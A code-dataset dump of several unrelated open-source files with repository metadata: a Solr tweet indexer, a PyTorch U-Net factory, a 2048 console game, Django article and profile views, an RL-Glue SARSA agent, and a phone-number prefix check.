                    "type": "text_general",
                    "multiValued": False
                }, {
                    "name": "text_en",
                    "type": "text_general",
                    "multiValued": False
                },
                {
                    "name": "text_ru",
                    "type": "text_general",
                    "multiValued": False
                },
                {
                    "name": "tweet_urls",
                    "type": "strings",
                    "multiValued": True
                },
                {
                    "name": "tweet_hashtags",
                    "type": "strings",
                    "multiValued": True
                }
            ]
        }
        requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
    def replace_fields(self):
        """Replace the schema definition of the 'age' field.

        NOTE(review): no 'age' field is added anywhere in this file --
        presumably left over from another core's schema; verify before use.
        """
        data = {
            "replace-field": [
                {
                    "name": "age",
                    "type": "string",
                    "multiValued": False
                }
            ]
        }
        requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
    def replace_VSM(self):
        """Switch the per-language text field types to VSM-style scoring.

        Each field type gets language-specific analyzers (stopwords,
        stemming) and ClassicSimilarityFactory, i.e. classic TF-IDF
        vector-space ranking instead of Solr's default BM25.
        """
        data = {
            "replace-field-type": [
                {
                    'name': 'text_en',
                    'class': 'solr.TextField',
                    'positionIncrementGap': '100',
                    # Index-time analysis: tokenize, drop stopwords,
                    # lowercase, strip possessives, protect words from
                    # stemming, then Porter-stem.
                    'indexAnalyzer': {
                        'tokenizer': {
                            'class': 'solr.StandardTokenizerFactory'
                        },
                        'filters': [{
                            'class': 'solr.StopFilterFactory',
                            'words': 'lang/stopwords_en.txt',
                            'ignoreCase': 'true'
                        }, {
                            'class': 'solr.LowerCaseFilterFactory'
                        }, {
                            'class': 'solr.EnglishPossessiveFilterFactory'
                        }, {
                            'class': 'solr.KeywordMarkerFilterFactory',
                            'protected': 'protwords.txt'
                        }, {
                            'class': 'solr.PorterStemFilterFactory'
                        }]
                    },
                    # Classic TF-IDF similarity = vector space model scoring.
                    'similarity': {
                        'class': 'solr.ClassicSimilarityFactory'
                    },
                    # Query-time analysis additionally expands synonyms.
                    'queryAnalyzer': {
                        'tokenizer': {
                            'class': 'solr.StandardTokenizerFactory'
                        },
                        'filters': [{
                            'class': 'solr.SynonymGraphFilterFactory',
                            'expand': 'true',
                            'ignoreCase': 'true',
                            'synonyms': 'synonyms.txt'
                        }, {
                            'class': 'solr.StopFilterFactory',
                            'words': 'lang/stopwords_en.txt',
                            'ignoreCase': 'true'
                        }, {
                            'class': 'solr.LowerCaseFilterFactory'
                        }, {
                            'class': 'solr.EnglishPossessiveFilterFactory'
                        }, {
                            'class': 'solr.KeywordMarkerFilterFactory',
                            'protected': 'protwords.txt'
                        }, {
                            'class': 'solr.PorterStemFilterFactory'
                        }]
                    }
                }, {
                    'name': 'text_ru',
                    'class': 'solr.TextField',
                    'positionIncrementGap': '100',
                    # Russian: lowercase, snowball stopwords, snowball stemmer.
                    'analyzer': {
                        'tokenizer': {
                            'class': 'solr.StandardTokenizerFactory'
                        },
                        'filters': [{
                            'class': 'solr.LowerCaseFilterFactory'
                        }, {
                            'class': 'solr.StopFilterFactory',
                            'format': 'snowball',
                            'words': 'lang/stopwords_ru.txt',
                            'ignoreCase': 'true'
                        }, {
                            'class': 'solr.SnowballPorterFilterFactory',
                            'language': 'Russian'
                        }]
                    },
                    'similarity': {
                        'class': 'solr.ClassicSimilarityFactory'
                    },
                }, {
                    'name': 'text_de',
                    'class': 'solr.TextField',
                    'positionIncrementGap': '100',
                    # German: lowercase, snowball stopwords, umlaut
                    # normalization, light stemming.
                    'analyzer': {
                        'tokenizer': {
                            'class': 'solr.StandardTokenizerFactory'
                        },
                        'filters': [{
                            'class': 'solr.LowerCaseFilterFactory'
                        }, {
                            'class': 'solr.StopFilterFactory',
                            'format': 'snowball',
                            'words': 'lang/stopwords_de.txt',
                            'ignoreCase': 'true'
                        }, {
                            'class': 'solr.GermanNormalizationFilterFactory'
                        }, {
                            'class': 'solr.GermanLightStemFilterFactory'
                        }]
                    },
                    'similarity': {
                        'class': 'solr.ClassicSimilarityFactory'
                    },
                }
            ]
        }
        requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
if __name__ == "__main__":
with open('train.json', encoding='utf-8') as f:
collection = json.load(f)
i = Indexer()
i.do_initial_setup()
i.replace_VSM()
i.add_fields()
i.create_documents(collection)
| [
"nirajchetry123@gmail.com"
] | nirajchetry123@gmail.com |
d146abd0ce416e7ed962725d433481917c4eff94 | 636743ea912b7a88efe99e8b2e642f38ed4ed588 | /tests/spam/__main__.py | 5c977b29a6845feceabf84db09f6317be2309b85 | [
"MIT"
] | permissive | anxuae/setuptools-cythonize | e1ad04b71cf652022133b27612b9233bb552ce9e | 11d16bf09bf8d779cdfc2232ff5e72fa7482f8ca | refs/heads/master | 2023-03-09T11:25:49.529571 | 2023-02-23T10:01:06 | 2023-02-23T10:01:06 | 171,926,063 | 40 | 11 | MIT | 2022-08-08T20:18:50 | 2019-02-21T18:47:47 | Python | UTF-8 | Python | false | false | 56 | py | # -*- coding: utf-8 -*-
from . import ham
# Entry point for `python -m <package>`: delegate straight to ham.main().
ham.main()
| [
"anxuae-prog@yahoo.fr"
] | anxuae-prog@yahoo.fr |
36967479d5f75a1c249097eadad1d5a82ddaa0c1 | 86446de4615ad079d379215fc579191734530a2b | /models/networks/__init__.py | f2a1ade9fb0e6b56998d4ca7e4c0caff65780800 | [] | no_license | devhliu/PerfusionCT-Net | 6ac7a8c7040073f00d58e807049171316a541130 | a1e1311b7c1524b94628d554df3149fdf2b168ff | refs/heads/main | 2023-03-11T09:00:27.770804 | 2020-12-18T09:13:29 | 2020-12-18T09:13:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | from .unet_2D import *
from .unet_3D import *
from .unet_nonlocal_2D import *
from .unet_nonlocal_3D import *
from .unet_grid_attention_3D import *
from .unet_pCT_multi_att_dsv_3D import *
from .unet_pCT_bayesian_multi_att_dsv_3D import *
from .unet_pCT_cascading_bayesian_multi_att_dsv_3D import *
from .unet_pCT_multi_att_dsv_with_2fconv_3D import *
def get_network(name, n_classes, in_channels=3, feature_scale=4, tensor_dim='2D',
                nonlocal_mode='embedded_gaussian', attention_dsample=(2,2,2),
                aggregation_mode='concat', prior_information_channels=None, conv_bloc_type=None, bayesian_skip_type='conv'):
    """Instantiate one of the registered segmentation networks by name.

    Args:
        name: registry key, e.g. 'unet', 'unet_nonlocal', 'unet_grid_gating',
            'unet_pct_multi_att_dsv', 'unet_pct_bayesian_multi_att_dsv', ...
        n_classes: number of output classes.
        in_channels: number of input channels.
        feature_scale: divisor applied to the base filter counts.
        tensor_dim: '2D' or '3D' variant of the architecture.
        nonlocal_mode: non-local block mode (non-local/attention models only).
        attention_dsample: attention-gate downsampling factor.
        aggregation_mode: kept for API compatibility (unused here).
        prior_information_channels: channels holding prior information for the
            bayesian variants; defaults to the last input channel.
        conv_bloc_type, bayesian_skip_type: options for the bayesian variants.

    Returns:
        The constructed network module.

    Raises:
        ValueError: if `name` is recognised by the registry but not handled
            by any constructor branch below.
    """
    model = _get_model_instance(name, tensor_dim)
    if name in ['unet']:
        model = model(n_classes=n_classes,
                      is_batchnorm=True,
                      in_channels=in_channels,
                      feature_scale=feature_scale,
                      is_deconv=False)
    elif name in ['unet_nonlocal']:
        model = model(n_classes=n_classes,
                      is_batchnorm=True,
                      in_channels=in_channels,
                      is_deconv=False,
                      nonlocal_mode=nonlocal_mode,
                      feature_scale=feature_scale)
    elif name in ['unet_grid_gating', 'unet_pct_multi_att_dsv', 'unet_pct_multi_att_dsv_with_2fconv']:
        model = model(n_classes=n_classes,
                      is_batchnorm=True,
                      in_channels=in_channels,
                      nonlocal_mode=nonlocal_mode,
                      feature_scale=feature_scale,
                      attention_dsample=attention_dsample,
                      is_deconv=False)
    elif name in ['unet_pct_bayesian_multi_att_dsv', 'unet_pct_cascading_bayesian_multi_att_dsv']:
        if prior_information_channels is None:
            # suppose that prior information is stored in last channel
            prior_information_channels = [in_channels - 1]
        model = model(n_classes=n_classes,
                      is_batchnorm=True,
                      in_channels=in_channels,
                      prior_information_channels = prior_information_channels,
                      nonlocal_mode=nonlocal_mode,
                      feature_scale=feature_scale,
                      attention_dsample=attention_dsample,
                      conv_bloc_type=conv_bloc_type,
                      bayesian_skip_type=bayesian_skip_type,
                      is_deconv=False)
    else:
        # Bug fix: the original `raise 'Model {} not available'` raised a bare
        # string, which is a TypeError in Python 3 -- raise a real exception.
        raise ValueError('Model {} not available'.format(name))
    return model
def _get_model_instance(name, tensor_dim):
    """Look up the model class registered under (name, tensor_dim).

    Raises KeyError if either the name or the dimensionality is unknown.
    """
    registry = {
        'unet': {'2D': unet_2D, '3D': unet_3D},
        'unet_nonlocal': {'2D': unet_nonlocal_2D, '3D': unet_nonlocal_3D},
        'unet_grid_gating': {'3D': unet_grid_attention_3D},
        'unet_pct_multi_att_dsv': {'3D': unet_pCT_multi_att_dsv_3D},
        'unet_pct_bayesian_multi_att_dsv': {'3D': unet_pCT_bayesian_multi_att_dsv_3D},
        'unet_pct_cascading_bayesian_multi_att_dsv': {'3D': unet_pCT_cascading_bayesian_multi_att_dsv_3D},
        'unet_pct_multi_att_dsv_with_2fconv': {'3D': unet_pCT_multi_att_dsv_with_2fconv_3D},
    }
    return registry[name][tensor_dim]
| [
"tensu.wave@gmail.com"
] | tensu.wave@gmail.com |
ba8b5a1c25a0b68a6c7c75b2bac381e05780d884 | 640b2fc43cf917d11ba866a20af545e63842c39f | /Projects/2048-Game/2048-Game-Answer.py | c6ac333e91911536019d482edd0ad1ccf51f9c9b | [] | no_license | mosalaheg/Python-Programming-Language | ad11c50f58fb014a2f61bc9d8f6c9a6bc960ca98 | 0441b259e8c35b00047d7ed8b3ca62528c739eae | refs/heads/master | 2023-02-16T07:22:09.186463 | 2021-01-16T15:21:51 | 2021-01-16T15:21:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,561 | py | '''
Assigning values to the grid
The grid will look like this:
0,0 | 0,1 | 0,2 | 0,3
1,0 | 1,1 | 1,2 | 1,3
2,0 | 2,1 | 2,2 | 2,3
3,0 | 3,1 | 3,2 | 3,3
'''
import random
N = 4
grid = []
#This function prints the grid of 2048 Game as the game progresses
def print_grid():
print('--' + '-----' * N + '----')
for i in range(N):
print(end='| ')
for j in range(N):
r = (5 - len(str(grid[i][j]))) // 2
e = (' ' * r) + (str(grid[i][j]) if grid[i][j] != 0 else ' ') + (' ' * r)
if len(e) < 5: e += ' '
print(e, end='')
print(end=' |')
print()
print('--' + '-----' * N + '----')
#This function generates a cell with value 2
def generate_cell():
a = random.randint(0, N-1)
b = random.randint(0, N-1)
while grid[a][b] != 0:
a = random.randint(0, N-1)
b = random.randint(0, N-1)
grid[a][b] = 2
#This function rotates the grid by 90 degree
def rotate_90():
for i in range(N//2):
for j in range(i, N-i-1):
k = grid[i][j]
grid[i][j] = grid[N-j-1][i]
grid[N-j-1][i] = grid[N-i-1][N-j-1]
grid[N-i-1][N-j-1] = grid[j][N-i-1]
grid[j][N-i-1] = k
#This function checks if the game state reachs 2048 or not
def check_win():
#Search for cell with value 2048
for i in range(N):
for j in range(N):
if grid[i][j] == 2048:
return True
return False
#This function checks if the direction have state reachs 2048 or not
def check_available_direction():
for i in range(N):
j = 0
while j < N and grid[i][j] == 0: j +=1
while j < N and grid[i][j] != 0: j +=1
if j < N: return True
for k in range(N-1):
if grid[i][k] == grid[i][k+1] and grid[i][k] != 0:
return True
return False
#This function checks if any direction have state reachs 2048 or not
def check_available_move(d):
res = False
#check direction right
if d == 3: res = check_available_direction()
rotate_90()
#check direction down
if d == 5: res = check_available_direction()
rotate_90()
#check direction left
if d == 1: res = check_available_direction()
rotate_90()
#check direction up
if d == 2: res = check_available_direction()
rotate_90()
return res
#This function checks if the game state over or not
def check_full():
for i in range(N):
for j in range(N):
if grid[i][j] == 0:
return False
for i in range(N-1):
if grid[N-1][i] == grid[N-1][i+1]:
return False
for i in range(N-1):
if grid[i][N-1] == grid[i+1][N-1]:
return False
for i in range(N-1):
for j in range(N-1):
if grid[i][j] == grid[i+1][j] or grid[i][j+1] == grid[i][j]:
return False
return True
#This function merges the grid with given direction
def merge():
for i in range(N):
j = N-1
while j > 0:
if grid[i][j] == grid[i][j-1] and grid[i][j] != 0:
grid[i][j] = 0
grid[i][j-1] *= 2
j -= 1
j -= 1
#This function checks if the direction have state reachs 2048 or not
def merge_direction(d):
#merge direction right
if d == 3: merge()
rotate_90()
#merge direction down
if d == 5: merge()
rotate_90()
#merge direction left
if d == 1: merge()
rotate_90()
#merge direction up
if d == 2: merge()
rotate_90()
#This function moves the grid with given direction
def move():
for i in range(N):
temp = []
for j in range(N):
if grid[i][j] != 0:
temp += [grid[i][j]]
for j in range(N):
grid[i][j] = temp[j] if j < len(temp) else 0
#This function checks if the direction have state reachs 2048 or not
def move_direction(d):
#move direction left
if d == 1: move()
rotate_90()
#move direction up
if d == 2: move()
rotate_90()
#move direction right
if d == 3: move()
rotate_90()
#move direction down
if d == 5: move()
rotate_90()
#This function checks if given position is valid or not
def check_valid_direction(i):
return i in [1, 2, 3, 5]
#This function clears the grid
def grid_clear():
global grid
grid = [[0] * N for i in range(N)]
#MAIN FUNCTION
def play_game():
print("2048 Game!")
print("Welcome...")
print("============================")
while True:
#Generate a cell in the grid
generate_cell()
#Prints the grid
print_grid()
i = int(input('Enter the direction: '))
while not check_valid_direction(i) or not check_available_move(i):
i = int(input('Enter a valid direction: '))
#Move with the input direction
move_direction(i)
#Merge with the input direction
merge_direction(i)
#Move with the input direction
move_direction(i)
#Check if the state of the grid has a win state
if check_win():
#Prints the grid
print_grid()
print('Congrats, You won!')
break
#Check if the state of the grid has a tie state
if check_full():
#Prints the grid
print_grid()
print("Woah! That's a tie!")
break
while True:
grid_clear()
play_game()
c = input('Play Again [Y/N] ')
if c not in 'yY':
break
| [
"noreply@github.com"
] | mosalaheg.noreply@github.com |
100087e0a834aae204c9f9f5dc60991b44184e19 | ed1c02ef4c4841d26df38442a595d48d837ac51c | /jianguo/views.py | 7c07ac54627199d388be94034bfd3a8710dba5f3 | [] | no_license | shuoli84/jianguo | 12e6b684b47bbd4181b31266b5ab23edf4a8b5e2 | eec39d8e55f31405fb18788017b70be367809102 | refs/heads/master | 2021-01-10T19:51:27.227560 | 2014-10-09T04:39:03 | 2014-10-09T04:39:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,603 | py | import json
from PIL import Image
from cStringIO import StringIO
from allauth.account.views import SignupView, LoginView
import bleach
from django.conf import settings
from django.core.files.storage import default_storage
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect, HttpResponseNotFound
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.utils.translation import gettext as _
from django.views.decorators.http import require_http_methods
from django.views.generic import TemplateView
from jianguo.forms import UploadProfileImage, RegisterForm
from jianguo.models import Article
class IndexView(LoginView):
    """Landing page: shows the login form to anonymous visitors and sends
    authenticated users straight to their home page."""
    template_name = 'index.jade'

    def dispatch(self, request, *args, **kwargs):
        user = request.user
        if not user.is_authenticated():
            return super(IndexView, self).dispatch(request, *args, **kwargs)
        return HttpResponseRedirect('/home/')


index = IndexView.as_view()
class RegisterView(SignupView):
    """Registration page: allauth's SignupView with the project's Jade
    template and a custom signup form."""
    template_name = 'register.jade'
    form_class = RegisterForm
register = RegisterView.as_view()
class ProfileView(TemplateView):
    """Profile page for the logged-in user.

    GET renders the profile template; POST updates the career and/or
    introduction fields of the user's profile.
    """
    template_name = 'profile.jade'
    def get_context_data(self, **kwargs):
        """Expose the current user's profile to the template.

        NOTE(review): kwargs are accepted but not forwarded to
        super().get_context_data() -- confirm this is intentional.
        """
        profile = self.request.user.profile
        context_data = super(ProfileView, self).get_context_data()
        context_data.update({
            'profile': profile
        })
        return context_data
    def post(self, request):
        """Update career/introduction on the user's profile; empty or missing
        values leave the existing field untouched."""
        career = request.POST.get('career', None)
        introduction = request.POST.get('introduction', None)
        profile = request.user.profile
        if career:
            profile.career = career
        if introduction:
            profile.introduction = introduction
        profile.save()
        return HttpResponse(status=200)
    # Require login for every HTTP method of this view.
    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(ProfileView, self).dispatch(*args, **kwargs)
profile = ProfileView.as_view()
@login_required
@require_http_methods(["POST"])
def upload_picture(request):
    """Store an uploaded profile picture and return its media path as JSON.

    Responds 400 with the form errors when validation fails.
    """
    form = UploadProfileImage(request.POST, request.FILES)
    if not form.is_valid():
        payload = json.dumps({"error": form.errors})
        return HttpResponse(payload, status=400, content_type="application/json")
    pic_file = request.FILES['picture']
    path = default_storage.save('pictures/' + pic_file.name, pic_file)
    payload = json.dumps({'path': settings.MEDIA_URL + path})
    return HttpResponse(payload, content_type='application/json')
@login_required
@require_http_methods(['POST'])
def set_profile_picture(request):
    """Crop a previously uploaded picture, thumbnail it to PROFILE_SIZE and
    save it as the current user's avatar; returns the new path as JSON."""
    picture = request.POST['picture']
    x = int(request.POST.get('x', '0'))
    y = int(request.POST.get('y', '0'))
    width = int(request.POST.get('width', '0'))
    height = int(request.POST.get('height', '0'))
    # Storage paths are relative to MEDIA_ROOT; strip a leading '/media/'.
    if picture.startswith('/media/'):
        picture = picture[7:]
    with default_storage.open(picture) as source:
        image = Image.open(source)
        image = image.crop((x, y, x + width, y + height))
        image.thumbnail(settings.PROFILE_SIZE, Image.ANTIALIAS)
        buffer = StringIO()
        image.save(buffer, format='JPEG')
    user = request.user
    buffer.seek(0)
    new_path = default_storage.save('profile/profile_%s.jpeg' % user.id, buffer)
    user.profile.avatar = new_path
    user.profile.save()
    payload = json.dumps({'path': settings.MEDIA_URL + new_path})
    return HttpResponse(payload, status=200, content_type="application/json")
class EditArticleView(TemplateView):
    """Article editor: GET renders the editor for an article, POST saves its
    title and/or content. Content is sanitized with bleach against the
    whitelists below before being stored."""
    template_name = 'edit_article.jade'
    # HTML tags that survive sanitization, on top of bleach's defaults.
    allowed_tags = bleach.ALLOWED_TAGS + [
        'p',
        'u',
        'div',
        'h1',
        'h2',
        'h3',
        'h4',
        'h5',
        'h6',
        'img',
        'figure',
        'br',
        'table',
        'thead',
        'tbody',
        'tr',
        'th',
        'td',
    ]
    # Bug fix: copy bleach's default mapping before extending it. The
    # original code updated bleach.ALLOWED_ATTRIBUTES in place, silently
    # changing the library-wide default for every other bleach caller.
    allowed_attributes = dict(bleach.ALLOWED_ATTRIBUTES)
    allowed_attributes.update({
        'img': ['src', 'alt'],
        'div': ['class', 'id'],
        'figure': ['class']
    })
    def get_context_data(self, **kwargs):
        """Expose the article being edited to the template (404 if missing)."""
        context = super(EditArticleView, self).get_context_data(**kwargs)
        article_id = kwargs.pop('article_id', None)
        article = get_object_or_404(Article, pk=article_id)
        context.update({'article': article})
        return context
    def post(self, request, **kwargs):
        """Save the posted title/content; only the author may edit.

        Missing or empty fields leave the stored value untouched.
        """
        title = request.POST.get('title', None)
        content = request.POST.get('content', None)
        article_id = kwargs['article_id']
        article = get_object_or_404(Article, pk=article_id)
        if article.author_id != request.user.id:
            return HttpResponseForbidden(_('You are not the author'))
        if title:
            article.title = title
        # Bug fix: the original tested `if article:` here, which is always
        # true after get_object_or_404 and crashed bleach.clean(None) when
        # no content was posted. Test the content itself, mirroring `title`.
        if content:
            content = bleach.clean(content, tags=self.allowed_tags, attributes=self.allowed_attributes)
            article.content = content
        article.save()
        return HttpResponse(status=200)
edit_article = EditArticleView.as_view()
class ViewArticleView(TemplateView):
    """Read-only article page. Unpublished articles 404 for non-authors;
    authors are redirected to the edit page instead."""
    template_name = 'view_article.jade'

    def get(self, request, *args, **kwargs):
        article_id = kwargs['article_id']
        article = get_object_or_404(Article, pk=article_id)
        is_author = article.author_id == request.user.id
        # Hide drafts from everyone but their author.
        if not (article.published or is_author):
            return HttpResponseNotFound(_("The article does not exist"))
        if is_author:
            return HttpResponseRedirect('/article/%s/edit/' % article_id)
        return super(ViewArticleView, self).get(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(ViewArticleView, self).get_context_data(**kwargs)
        context['article'] = get_object_or_404(Article, pk=kwargs['article_id'])
        return context


view_article = ViewArticleView.as_view()
@login_required
@require_http_methods(['POST'])
def new_article(request):
    """Create an empty draft owned by the current user and open its editor."""
    draft = Article()
    draft.author = request.user
    draft.created_at = timezone.now()
    draft.save()
    edit_url = '/article/%s/edit/' % draft.id
    return HttpResponseRedirect(edit_url)
@login_required
@require_http_methods(['POST'])
def publish_article(request, article_id):
    """Set an article's published flag from the 'publish' POST parameter
    (defaults to publishing); only the author may do this."""
    article = get_object_or_404(Article, pk=article_id)
    if article.author_id != request.user.id:
        return HttpResponseForbidden('You are not the author')
    article.published = request.POST.get('publish', 'true') == 'true'
    article.save()
    payload = json.dumps({'published': article.published})
    return HttpResponse(payload, status=200, content_type='application/json')
class UserHomeView(TemplateView):
    """Home feed for a logged-in user: all published articles plus the
    user's own (possibly unpublished) ones, newest first."""
    template_name = 'user_home.jade'

    def get_context_data(self, **kwargs):
        context = super(UserHomeView, self).get_context_data(**kwargs)
        visible = Q(published=True) | Q(author_id=self.request.user.id)
        context['articles'] = Article.objects.filter(visible).order_by('-created_at')
        return context

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(UserHomeView, self).dispatch(*args, **kwargs)


user_home = UserHomeView.as_view()
| [
"shuoli84@gmail.com"
] | shuoli84@gmail.com |
d9710887764f46586e84460a1df8a1f12d86b0f2 | c8b7c217a0b9ecb69913ccaf533348167a5f6fd4 | /sarsa_old_c.py | 747a60e5cedcf2ce102c55c44155e010ab50bea5 | [] | no_license | vaishnavh/gridworld | 343701aab897c0015fbfaf7bf4665519efba56a2 | 806bdc6ad11fd6a7ea137e8a4e3bac599a4ae9b3 | refs/heads/master | 2020-04-13T17:24:39.158075 | 2015-03-11T16:43:25 | 2015-03-11T16:43:25 | 31,503,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,565 | py | #
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 1011 $
# $Date: 2009-02-11 22:29:54 -0700 (Wed, 11 Feb 2009) $
# $Author: brian@tannerpages.com $
# $HeadURL: http://rl-library.googlecode.com/svn/trunk/projects/packages/examples/mines-sarsa-python/sample_sarsa_agent.py $
import random
import sys
import copy
import pickle
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from rlglue.types import Observation
from rlglue.utils import TaskSpecVRLGLUE3
from random import Random
import math
# This is a very simple Sarsa agent for discrete-action, discrete-state
# environments. It uses epsilon-greedy exploration.
#
# We've made a decision to store the previous action and observation in
# their raw form, as structures. This code could be simplified and you
# could store them just as ints.
# TO USE THIS Agent [order doesn't matter]
# NOTE: I'm assuming the Python codec is installed an is in your Python path
# - Start the rl_glue executable socket server on your computer
# - Run the SampleMinesEnvironment and SampleExperiment from this or a
# different codec (Matlab, Python, Java, C, Lisp should all be fine)
# - Start this agent like:
# $> python sample_sarsa_agent.py
class sarsa_agent(Agent):
randGenerator=Random()
lastAction=Action()
lastObservation=Observation()
sarsa_stepsize = 0.4
sarsa_epsilon = 0.1
sarsa_gamma = 0.9
episodeCount = 0
numStates = 0
numActions = 0
value_function = None
policyFrozen=False
exploringFrozen=False
def agent_init(self,taskSpecString):
TaskSpec = TaskSpecVRLGLUE3.TaskSpecParser(taskSpecString)
if TaskSpec.valid:
assert len(TaskSpec.getIntObservations())==1, "expecting 1-dimensional discrete observations"
assert len(TaskSpec.getDoubleObservations())==0, "expecting no continuous observations"
assert not TaskSpec.isSpecial(TaskSpec.getIntObservations()[0][0]), " expecting min observation to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntObservations()[0][1]), " expecting max observation to be a number not a special value"
self.numStates=TaskSpec.getIntObservations()[0][1]+1;
assert len(TaskSpec.getIntActions())==1, "expecting 1-dimensional discrete actions"
assert len(TaskSpec.getDoubleActions())==0, "expecting no continuous actions"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][0]), " expecting min action to be a number not a special value"
assert not TaskSpec.isSpecial(TaskSpec.getIntActions()[0][1]), " expecting max action to be a number not a special value"
self.numActions=TaskSpec.getIntActions()[0][1]+1;
self.value_function=[self.numActions*[0.0] for i in range(self.numStates)]
self.episodeCount = 0
else:
print "Task Spec could not be parsed: "+taskSpecString;
self.lastAction=Action()
self.lastObservation=Observation()
def egreedy(self, state):
maxIndex=0
a=1
if not self.exploringFrozen and self.randGenerator.random()<self.sarsa_epsilon:
return self.randGenerator.randint(0,self.numActions-1)
return self.value_function[state].index(max(self.value_function[state]))
def agent_start(self,observation):
theState=observation.intArray[0]
thisIntAction=self.egreedy(theState)
returnAction=Action()
returnAction.intArray=[thisIntAction]
self.sarsa_epsilon = math.exp(-0.008*self.episodeCount) + 0.15
self.sarsa_stepsize = 0.4
#self.sarsa_stepsize = min([math.exp(-0.005*self.episodeCount),1])
#print self.sarsa_epsilon
self.episodeCount += 1
self.lastAction=copy.deepcopy(returnAction)
self.lastObservation=copy.deepcopy(observation)
return returnAction
def agent_step(self,reward, observation):
newState=observation.intArray[0]
lastState=self.lastObservation.intArray[0]
lastAction=self.lastAction.intArray[0]
newIntAction=self.egreedy(newState)
Q_sa=self.value_function[lastState][lastAction]
Q_sprime_aprime=self.value_function[newState][newIntAction]
new_Q_sa=Q_sa + self.sarsa_stepsize * (reward + self.sarsa_gamma * Q_sprime_aprime - Q_sa)
if not self.policyFrozen:
self.value_function[lastState][lastAction]=new_Q_sa
returnAction=Action()
returnAction.intArray=[newIntAction]
self.lastAction=copy.deepcopy(returnAction)
self.lastObservation=copy.deepcopy(observation)
return returnAction
def agent_end(self,reward):
lastState=self.lastObservation.intArray[0]
lastAction=self.lastAction.intArray[0]
Q_sa=self.value_function[lastState][lastAction]
new_Q_sa=Q_sa + self.sarsa_stepsize * (reward - Q_sa)
if not self.policyFrozen:
self.value_function[lastState][lastAction]=new_Q_sa
def agent_cleanup(self):
pass
def save_value_function(self, fileName):
theFile = open(fileName, "w")
pickle.dump(self.value_function, theFile)
theFile.close()
def load_value_function(self, fileName):
theFile = open(fileName, "r")
self.value_function=pickle.load(theFile)
theFile.close()
def agent_message(self,inMessage):
# Message Description
# 'freeze learning'
# Action: Set flag to stop updating policy
#
if inMessage.startswith("freeze learning"):
self.policyFrozen=True
return "message understood, policy frozen"
# Message Description
# unfreeze learning
# Action: Set flag to resume updating policy
#
if inMessage.startswith("unfreeze learning"):
self.policyFrozen=False
return "message understood, policy unfrozen"
#Message Description
# freeze exploring
# Action: Set flag to stop exploring (greedy actions only)
#
if inMessage.startswith("freeze exploring"):
self.exploringFrozen=True
return "message understood, exploring frozen"
#Message Description
# unfreeze exploring
# Action: Set flag to resume exploring (e-greedy actions)
#
if inMessage.startswith("unfreeze exploring"):
self.exploringFrozen=False
return "message understood, exploring frozen"
#Message Description
# save_policy FILENAME
# Action: Save current value function in binary format to
# file called FILENAME
#
if inMessage.startswith("save_policy"):
splitString=inMessage.split(" ");
self.save_value_function(splitString[1]);
print "Saved.";
return "message understood, saving policy"
#Message Description
# load_policy FILENAME
# Action: Load value function in binary format from
# file called FILENAME
#
if inMessage.startswith("load_policy"):
splitString=inMessage.split(" ")
self.load_value_function(splitString[1])
print "Loaded."
return "message understood, loading policy"
return "SampleSarsaAgent(Python) does not understand your message."
if inMessage.startswith("reset_run"):
self.episodeCount = 0
print "Episode Reset."
return "message understood, resetting run"
return "SampleSarsaAgent(Python) does not understand your message."
# Connect this agent to a running rl_glue socket server (blocks until done).
if __name__=="__main__":
    AgentLoader.loadAgent(sarsa_agent())
| [
"vaishnavh.nagarajan@gmail.com"
] | vaishnavh.nagarajan@gmail.com |
13d05cb39bba97f674f5ca270d5b2d2e124d3ff1 | 677463864f16211de9b9449af003ba9394779815 | /01_hash/q2_전화번호 목록.py | dddb06e26a5e9769aff19c6f84bbd2091a4ce2b2 | [] | no_license | seydouxxx/programmersLearningSet | c1bb13de8c63126d3108dbfe6e63a3a49f988fc7 | a7f2e37b10bf0d30601d74b51f5b1935b53b3b64 | refs/heads/main | 2023-05-14T13:06:11.580997 | 2021-06-07T11:59:37 | 2021-06-07T11:59:37 | 368,510,950 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | # 20210518
def solution(phone_book):
    """Return True iff no number in *phone_book* is a prefix of another.

    For each number, every proper prefix (hence the n[:-1] slice, which
    excludes the number itself) is checked against the set of all numbers.

    Fixed: the original tested ``t not in d`` and returned False, which is
    inverted — it returned False whenever a prefix was *absent*, e.g.
    solution(["123", "456"]) wrongly gave False.
    """
    numbers = set(phone_book)   # O(1) membership instead of a 0-valued dict
    for number in phone_book:
        prefix = ""
        for ch in number[:-1]:
            prefix += ch
            if prefix in numbers:
                return False
    return True
"risc@kakao.com"
] | risc@kakao.com |
